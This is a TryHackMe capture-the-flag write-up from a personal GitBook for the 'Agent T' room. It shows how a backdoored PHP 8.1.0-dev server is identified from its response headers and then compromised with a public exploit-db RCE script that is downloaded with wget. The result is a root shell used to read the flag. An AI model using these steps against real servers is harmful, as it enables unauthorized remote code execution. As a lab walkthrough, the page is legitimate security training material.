🎯
dmdhrumilmistry's gitbook
  • dmdhrumilmistry's gitbook
  • Blog
    • TryHackMe WriteUps
      • PickleRick
      • StartUp
      • Basic Malware RE
      • Bounty Hacker
      • Lazy Admin
      • Crack The Hash
      • Cyborg
      • OverPass
      • OverPass2
      • Agent T
      • Vulnerable API App
      • Git-Happens
      • Kiba
    • Vulnerabilities in Wild
      • Hiring Platform Exposing Thousands of User's Data
      • Security Analysis of the Indian Government's Student Assessment Platform
      • Exploiting S3 bucket misconfiguration to dump users emails
      • Getting Shell Access to ADB Exposed Smart Devices πŸ“²πŸ“ΊβŒš
      • Hacking Mumbai's Metro ChatBot and APIs for FUN πŸ€ΈπŸ»β€β™‚οΈ
      • Random Object Referencing IDs Still Aren't Safe in APIs πŸ’₯
      • Exploring Weird Account TakeOver (ATO) Vulnerabilities in APIs
    • Secure Software Development
      • Validating File Content Types to avoid Malicious File Hosting using ML Model
      • Securing Containers Supply Chain using Secure Base Layer Image
      • Automated API Tests in SDLC are Boon
Powered by GitBook
On this page
  • Target Details
  • Send Request to Target Machine
  • Running Exploit Script
  • Get The FLAG!!

Was this helpful?

  1. Blog
  2. TryHackMe WriteUps

Agent T

PreviousOverPass2NextVulnerable API App

Last updated 2 years ago

Was this helpful?

AgentT room has a weird behaving admin dashboard which isn't operational. Attacker needs to find their way into the server!

Target Details

  • TARGET_IP : 10.10.71.24

  • HTTP service running on Port 80

Send Request to Target Machine

  • Send Get request

    curl -X GET http://{TARGET_IP}

--snip--

    returns webpage html content (basic template from the web)

  • Investigate headers

    $ curl -I http://10.10.71.24
HTTP/1.1 200 OK
Host: 10.10.71.24
Date: Sun, 27 Nov 2022 07:57:06 GMT
Connection: close
X-Powered-By: PHP/8.1.0-dev
Content-type: text/html; charset=UTF-8

    Now we know that server is running PHP 8.1.0 dev on backend

  • Finding for PHP 8.1.0-dev exploits on the web, we get a RCE exploit from

Running Exploit Script

  • Download Exploit

    wget https://www.exploit-db.com/download/49933 -O exploit.py

  • Execute Exploit

    $ python3 exploit-t.py 
Enter the full host url:
http://{TARGET_IP}

Interactive shell is opened on http://{TARGET_IP}
Can't acces tty; job crontol turned off.
$ whoami
root

    Now we can execute code remotely on the web server as root user

Get The FLAG!!

  • List directories

    $ ls /
bin
boot
dev
etc
flag.txt
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

    flat.txt is in / dir

  • Read Flag

    $ cat /flag.txt
flag{REDACTED}
exploit-db